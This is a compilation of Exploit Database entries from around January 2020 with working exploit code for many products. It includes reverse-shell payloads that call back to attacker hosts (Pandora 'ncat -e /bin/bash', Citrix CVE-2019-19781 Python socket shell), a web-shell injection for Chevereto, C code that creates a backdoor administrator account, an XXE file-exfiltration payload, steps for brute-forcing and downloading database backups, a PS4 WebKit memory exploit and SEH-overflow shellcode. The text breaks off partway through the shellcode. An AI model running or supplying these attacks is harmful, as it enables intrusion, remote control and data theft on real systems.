-
Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)
/* bad_hoist ============ Exploit implementation of [CVE-2018-4386](https://bugs.chromium.org/p/project-zero/issues/detail?id=1665). Obtains addrof/fakeobj and arbitrary read/write primitives. Supports PS4 consoles on 6.XX. May also work on older firmware versions, but I am not sure. Bug was fixed in firmware 7.00. EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47893.zip */ var STRUCTURE_SPRAY_SIZE = 0x1800; var g_confuse_obj = null; var g_arb_master = null; var g_arb_slave = new Uint8Array(0x2000); var g_leaker = {}; var g_leaker_addr = null; var g_structure_spray = []; var dub = new Int64(0x41414141, 0x41414141).asDouble(); var g_inline_obj = { a: dub, b: dub, }; function spray_structs() { for (var i = 0; i < STRUCTURE_SPRAY_SIZE; i++) { var a = new Uint32Array(0x1) a["p" + i] = 0x1337; g_structure_spray.push(a); // keep the Structure objects alive. } } function trigger() { var o = { 'a': 1 }; var test = new ArrayBuffer(0x100000); g_confuse_obj = {}; var cell = { js_cell_header: new Int64([ 0x00, 0x8, 0x00, 0x00, // m_structureID, current guess 0x0, // m_indexingType 0x27, // m_type, Float64Array 0x18, // m_flags, OverridesGetOwnPropertySlot | // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero 0x1 // m_cellState, NewWhite ]).asJSValue(), butterfly: false, // Some arbitrary value vector: g_inline_obj, len_and_flags: (new Int64('0x0001000100000020')).asJSValue() }; g_confuse_obj[0 + "a"] = cell; g_confuse_obj[1 + "a"] = {}; g_confuse_obj[1 + "b"] = {}; g_confuse_obj[1 + "c"] = {}; g_confuse_obj[1 + "d"] = {}; for (var j = 0x5; j < 0x20; j++) { g_confuse_obj[j + "a"] = new Uint32Array(test); } for (var k in o) { { k = { a: g_confuse_obj, b: new ArrayBuffer(test.buffer), c: new ArrayBuffer(test.buffer), d: new ArrayBuffer(test.buffer), e: new ArrayBuffer(test.buffer), 1: new ArrayBuffer(test.buffer), }; function k() { return k; } } o[k]; if (g_confuse_obj["0a"] instanceof Uint32Array) { return; } } } 
function setup_arb_rw() { var jsCellHeader = new Int64([ 0x00, 0x08, 0x00, 0x00, // m_structureID, current guess 0x0, // m_indexingType 0x27, // m_type, Float64Array 0x18, // m_flags, OverridesGetOwnPropertySlot | // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero 0x1 // m_cellState, NewWhite ]); g_fake_container = { jsCellHeader: jsCellHeader.asJSValue(), butterfly: false, // Some arbitrary value vector: g_arb_slave, lengthAndFlags: (new Int64('0x0001000000000020')).asJSValue() }; g_inline_obj.a = g_fake_container; g_confuse_obj["0a"][0x4] += 0x10; g_arb_master = g_inline_obj.a; g_arb_master[0x6] = 0xFFFFFFF0; } function read(addr, length) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); var a = new Array(length); for (var i = 0; i < length; i++) a[i] = g_arb_slave[i]; return a; } function read8(addr) { return read(addr, 1)[0]; } function read16(addr) { return Struct.unpack(Struct.int16, read(addr, 2)); } function read32(addr) { return Struct.unpack(Struct.int32, read(addr, 4)); } function read64(addr) { return new Int64(read(addr, 8)); } function readstr(addr) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); var a = []; for (var i = 0;; i++) { if (g_arb_slave[i] == 0) { break; } a[i] = g_arb_slave[i]; } return String.fromCharCode.apply(null, a); } function write(addr, data) { if (!(addr instanceof Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); for (var i = 0; i < data.length; i++) g_arb_slave[i] = data[i]; } function write8(addr, val) { write(addr, [val]); } function write16(addr, val) { write(addr, Struct.pack(Struct.int16, val)); } function write32(addr, val) { write(addr, Struct.pack(Struct.int32, val)); } function write64(addr, val) { if (!(val instanceof Int64)) val = new Int64(val); write(addr, val.bytes()); } function writestr(addr, str) { if (!(addr instanceof 
Int64)) addr = new Int64(addr); g_arb_master[4] = addr.low32(); g_arb_master[5] = addr.hi32(); for (var i = 0; i < str.length; i++) g_arb_slave[i] = str.charCodeAt(i); g_arb_slave[str.length] = 0; // null character } function setup_obj_leaks() { g_leaker.leak = false; g_inline_obj.a = g_leaker; g_leaker_addr = new Int64(g_confuse_obj["0a"][4], g_confuse_obj["0a"][5]).add(0x10); debug_log("obj_leaker address @ " + g_leaker_addr); } function addrof(obj) { g_leaker.leak = obj; return read64(g_leaker_addr); } function fakeobj(addr) { write64(g_leaker_addr, addr); return g_leaker.leak; } function typed_array_buf_addr(typed_array) { return read64(addrof(typed_array).add(0x10)); } function cleanup() { var u32array = new Uint32Array(8); header = read(addrof(u32array), 0x10); write(addrof(g_arb_master), header); write(addrof(g_confuse_obj['0a']), header); // Set length to 0x10 and flags to 0x1 // Will behave as OversizeTypedArray which can survive gc easily write32(addrof(g_arb_master).add(0x18), 0x10); write32(addrof(g_arb_master).add(0x1C), 0x1); // write32(addrof(g_confuse_obj['0a']).add(0x18), 0x10); write32(addrof(g_confuse_obj['0a']).add(0x1C), 0x1); write32(addrof(g_arb_slave).add(0x1C), 0x1); var empty = {}; header = read(addrof(empty), 0x8); write(addrof(g_fake_container), header); } function start_exploit() { debug_log("Spraying Structures..."); spray_structs(); debug_log("Structures sprayed!"); debug_log("Triggering bug..."); trigger(); debug_log("Bug successfully triggered!"); debug_log("Crafting fake array for arbitrary read and write..."); setup_arb_rw(); debug_log("Array crafted!"); debug_log("Setting up arbitrary object leaks..."); setup_obj_leaks(); debug_log("Arbitrary object leaks achieved!"); debug_log("Cleaning up corrupted structures..."); cleanup(); debug_log("Cleanup done!"); debug_log("Starting post exploitation..."); } start_exploit();
-
TotalAV 2020 4.14.31 - Privilege Escalation
# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation # Date: 2020-01-09 # Exploit Author: Kusol Watchara-Apanukorn # Vendor Homepage: https://www.totalav.com/ # Version: 4.14.31 # Fixed on: 5.3.35 # Tested on: Windows 10 x64 # CVE : CVE-2019-18194 # Vulnerability Description: # TotalAV 2020 4.14.31 has a quarantine flaw that allows an attacker to escalate # privilege by using an NTFS directory junction. **You can download the vulnerable version with this link: https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe /////////////////////////////////// Proof of Concept ////////////////////////////////// 1. Plant the malicious file in this case we use DLL file 2. To exploit the vulnerability antivirus must detect the malicious dll 3. Move it to quarantine. 4. Attacker must create NTFS directory junction to restore Full step: https://www.youtube.com/watch?v=88qeaLq98Gc Vulnerability Disclosure Timeline: ================================== 17 Oct, 19 : Found Vulnerability 18 Oct, 19 : Vendor Notification 18 Oct, 19 : Request CVE 21 Oct, 19 : Vendor Response mid Dec, 19 : Vendor released a new patch (v5.3.35) 09 Jan, 20: Vulnerability Disclosure
-
MSN Password Recovery 1.30 - XML External Entity Injection
# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2020-01-08 # Vendor Homepage : https://www.top-password.com/ # Software Link: https://www.top-password.com/download/MSNPRSetup.exe # Tested on OS: Windows 10 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software MSN Password Recovery 5) Click the 'Help' button and a 'Msn Password Recovery' window opens 6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml 7) Click the 'View' button 8) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
-
Pandora 7.0NG - Remote Code Execution
# Exploit Title: Pandora 7.0NG - Remote Code Execution # Date: 2019-11-14 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2019-20224 # Vendor Homepage: https://pandorafms.org/ # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Version: v7.0NG # Tested on: CentOS 7.3 / PHP 5.4.16 #!/usr/bin/python3 import requests import sys if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = int(sys.argv[5]) request = requests.session() login_info = { "nick": username, "pass": password, "login_button": "Login" } login_request = request.post( target+"/pandora_console/index.php?login=1", login_info, verify=False, allow_redirects=True ) resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") exit() else: print("[+] Logged In Successfully") print("[+] Sending crafted graph request ..") body_request = { "date": "0", "time": "0", "period": "0", "interval_length": "0", "chart_type": "netflow_area", "max_aggregates": "1", "address_resolution": "0", "name": "0", "assign_group": "0", "filter_type": "0", "filter_id": "0", "filter_selected": "0", "ip_dst": "0", "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port), "draw_button": "Draw" } draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request)
-
ASTPP 4.0.1 VoIP Billing - Database Backup Download
# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download # Date: 2019-11-18 # Exploit Author: Fabien AUNAY # Vendor Homepage: https://www.astppbilling.org/ # Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1 # Version: 4.0.1 vendor default setup script # Tested on: Debian 9 - CentOS 7 # CVE : - ########################################################################################################### ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers! It is available as an open source solution. It means that without any investment, one can start a telephony business using ASTPP. ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing solution to “A Smart TelePhony Platform”. The latest version of ASTPP is provisioned with some advanced functional modules which are designed to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class 4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart Technology. When an administrator performs an ASTPP backup in the web interface (Configuration / Database Restore / Create), the file name follows a semi-predictable pattern and the file is stored in /var/www/html/astpp/database_backup/. 
The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz Pattern review: - astpp_ - year - month - day - 6 PIN digit Steps: Objective 1 : Generate your 6 PIN list Objective 2 : FUZZ the target URL Objective 3 : Download the mysqldump ########################################################################################################### Objective 1: Generate your 6 PIN list POC: crunch 6 6 0123456789 > pin_fuzzer.list Objective 2 : FUZZ the target URL POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz' =================================================================== ID Response Lines Word Chars Payload =================================================================== 000080137: 200 1135 L 6859 W 550239 Ch "080136" Objective 3 : Download the mysqldump POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3
-
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
# Exploit Title: PixelStor 5000 - Remote Code Execution # Product: PixelStor 5000 # Vendor: Rasilient # Date: 2020-01-08 # Exploit Author: .:UND3R:. # Vendor Homepage: http://rasilient.com # Version: K:4.0.1580-20150629 (KDI Version) # Tested on: K:4.0.1580-20150629 (KDI Version) # CVE: CVE-2020-6756 # URL Author: https://pwnedchile.com # Thanks: Dani Pelotocino <3, Roit import requests, sys def poc(target, cmd): url = target + "/Option/languageOptions.php" headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"} data = {"lang": ";" + cmd + ";/bin/echo -n en"} r = requests.post(url, headers=headers, data=data) if(r.status_code == 200): print("\nPwned :]") else: print("\nNot vulnerable :(") print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3") if len(sys.argv) !=2: print("\n[+] Usage: python " + sys.argv[0] + " <url>\n") sys.exit(1) if __name__ == "__main__": url = sys.argv[1] cmd = raw_input("\n[Linux Command]:") poc(url, cmd) #EoF
-
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)
#!/bin/bash # Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 # Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' # Release Date : 11/01/2020 # Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia echo "================================================================================= ___ _ _ ____ ___ _ _ | _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ | _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' | |_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_| |__/ CVE-2019-19781 =================================================================================" ############################## if [ -z "$1" ]; then echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n' exit; fi filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is echo -ne "Command Output :\n" curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
-
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution
#!/usr/bin/python3 # # Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 # # You only need a listener like netcat to catch the shell. # # Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White # # Tool Written by: Rob Simon and David Kennedy import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings import random import string import time from random import randint import argparse import sys # random string generator def randomString(stringLength=10): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) # our random string for filename - will leave artifacts on system filename = randomString() randomuser = randomString() # generate random number for the nonce nonce = randint(5, 15) # this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script # note that the file location will be in /netscaler/portal/templates/filename.xml def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) encoded = "" i=0 text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport)) while i < len(text): encoded = encoded + "chr("+str(ord(text[i]))+") . 
" i += 1 encoded = encoded[:-3] payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]" headers = ( { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), 'NSC_NONCE' : '%s' % (nonce), }) data = ( { "url" : "127.0.0.1", "title" : payload, "desc" : "desc", "UI_inuse" : "a" }) url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport)) requests.post(url, data=data, headers=headers, verify=False) # this is our second stage that triggers the exploit for us def stage2(filename, randomuser, nonce, victimip, victimport): headers = ( { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', 'NSC_USER' : '%s' % (randomuser), 'NSC_NONCE' : '%s' % (nonce), }) requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False) # start our main code to execute print(''' .o oOOOOOOOo OOOo Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO OOOOO '"OOOOOOOOOOOOOOOO"` oOO oOOOOOba. .adOOOOOOOOOOba .adOOOOo. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': `$" `OOOO' `O"Y ' `OOOO' o . . . OP" : o . 
: Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution. Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/ Usage: python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''') # parse our commands parser = argparse.ArgumentParser() parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)") parser.add_argument("targetport", help="the target server web port (normally on 443)") parser.add_argument("attackerip", help="the attackers reverse listener IP address") parser.add_argument("attackerport", help="the attackersa reverse listener port") args = parser.parse_args() print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...") print("[*] Saving filename as %s.xml on the victim machine..." % (filename)) # trigger our first post stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) print("[*] Sleeping for 2 seconds to ensure file is written before we call it...") time.sleep(2) print("[*] Triggering GET request for the newly created file with a listener waiting...") print("[*] Shell should now be in your listener... enjoy. Keep this window open..") print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/") # trigger our second post stage2(filename, randomuser, nonce, args.target, args.targetport)
-
Chevereto 3.13.4 Core - Remote Code Execution
# Exploit Title: Chevereto 3.13.4 Core - Remote Code Execution # Date: 2020-01-11 # Exploit Author: Jinny Ramsmark # Vendor Homepage: https://chevereto.com/ # Software Link: https://github.com/Chevereto/Chevereto-Free/releases # Version: 1.0.0 Free - 1.1.4 Free, <= 3.13.4 Core # Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41 # CVE : N/A from urllib import request, parse from time import sleep #Python3 #Needs to have a valid database server, database and user to exploit #1.0.0 Free version confirmed vulnerable #1.1.4 Free version confirmed vulnerable #3.13.4 Core version confirmed vulnerable def main(): target = 'http://cheveretoinstallation/' cookie = 'PHPSESSID=89efba681a8bb81d32cd10d3170baf6e' db_host = 'ip_to_valid_mysql' db_name = 'valid_db' db_user = 'valid_user' db_pass = 'valid_pass' db_table_prefix = 'chv_' inject = "';if(strpos(file_get_contents('images/license.php'), '$_POST[\"ccc\"]') === false){file_put_contents('images/license.php','if(isset($_POST[\"ccc\"])){;system($_POST[\"ccc\"]);}');}//" #Clean data for when we want to clean up the settings file params = {'db_host': db_host, 'db_name': db_name, 'db_user': db_user, 'db_pass': db_pass, 'db_table_prefix': db_table_prefix} data = parse.urlencode(params).encode() #Settings data with injected code params['db_table_prefix'] += inject dataInject = parse.urlencode(params).encode() #Do inject doPostRequest(target + 'install', dataInject, cookie) sleep(1) #Request index page to run the injected code doRequest(target) sleep(1) #Do a clean request to clean up the settings.php file doPostRequest(target + 'install', data, cookie) def doPostRequest(target, data, cookie): req = request.Request(target, data=data) req.add_header('Cookie', cookie) resp = request.urlopen(req) def doRequest(target): req = request.Request(target) resp = request.urlopen(req) if __name__ == '__main__': main()
-
SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
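#!/usr/bin/python
# Exploit Title: SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotDialup
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotDialup Crashed
'''

# Crash input: a long run of one printable character. The PoC only shows
# that the 'Name' field length is not bounded; there is no code in the payload.
buffer = "A" * 1000
payload = buffer

try:
    # Context manager closes the handle even if write() raises, so a partial
    # file is never left open.
    with open("poc.txt", "w") as f:
        print("[+] Creating %s bytes evil payload." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as exc:
    # Narrow catch: the original bare `except:` also swallowed KeyboardInterrupt
    # and hid the actual reason the file could not be written.
    print("File cannot be created: %s" % exc)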
-
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
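#!/usr/bin/python
# Exploit Title: SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotoutlook_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotOutlook
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotOutlook Crashed
'''

# Crash input: a long run of one printable character. The PoC only shows
# that the 'Name' field length is not bounded; there is no code in the payload.
buffer = "A" * 1000
payload = buffer

try:
    # Context manager closes the handle even if write() raises, so a partial
    # file is never left open.
    with open("poc.txt", "w") as f:
        print("[+] Creating %s bytes evil payload." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as exc:
    # Narrow catch: the original bare `except:` also swallowed KeyboardInterrupt
    # and hid the actual reason the file could not be written.
    print("File cannot be created: %s" % exc)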
-
Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions # Exploit Author: ZwX # Exploit Date: 2020-01-12 # Vendor Homepage : https://advancedsystemrepair.com/ # Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe # Tested on OS: Windows 10 # Proof of Concept (PoC): ========================== C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe AdvancedSystemRepairPro.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) dsutil.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) tscmon.exe Everyone:(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) #Exploit code(s): ================= 1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe" #include<windows.h> int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker /add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0); return 0; } 2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe" 3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory 4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE. Privilege Successful Escalation
-
Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
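#!/usr/bin/python
# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
# Version: 1.30
# Tested on: Windows 7 SP1 32-bit
# Copy paste the contents of poc.txt into the
# User Name / Registration Code input fields.

# Crash input: 5000 printable bytes. The PoC only shows the input fields are
# unbounded; the payload carries no code.
# NOTE: the published listing was quoted-printable mangled ("=3D" in place of
# "="), which made the script a SyntaxError; restored here.
poc = "A" * 5000

# Context manager guarantees the handle is closed even if write() fails.
with open("poc.txt", "w") as f:
    f.write(poc)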
-
Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
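#!/usr/bin/python
# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Backup Key Recovery Crashed
'''

# Crash input: a long run of one printable character. The PoC only shows
# that the 'Name' field length is not bounded; there is no code in the payload.
buffer = "A" * 1000
payload = buffer

try:
    # Context manager closes the handle even if write() raises, so a partial
    # file is never left open.
    with open("poc.txt", "w") as f:
        print("[+] Creating %s bytes evil payload." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as exc:
    # Narrow catch: the original bare `except:` also swallowed KeyboardInterrupt
    # and hid the actual reason the file could not be written.
    print("File cannot be created: %s" % exc)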
-
Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.alloksoft.com # Software Link: https://www.alloksoft.com/allok_vconverter.exe # Version: 4.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the License Name input field # of Allok Video Converter 4.6.1217 to execute calc.exe. nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode= _calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += 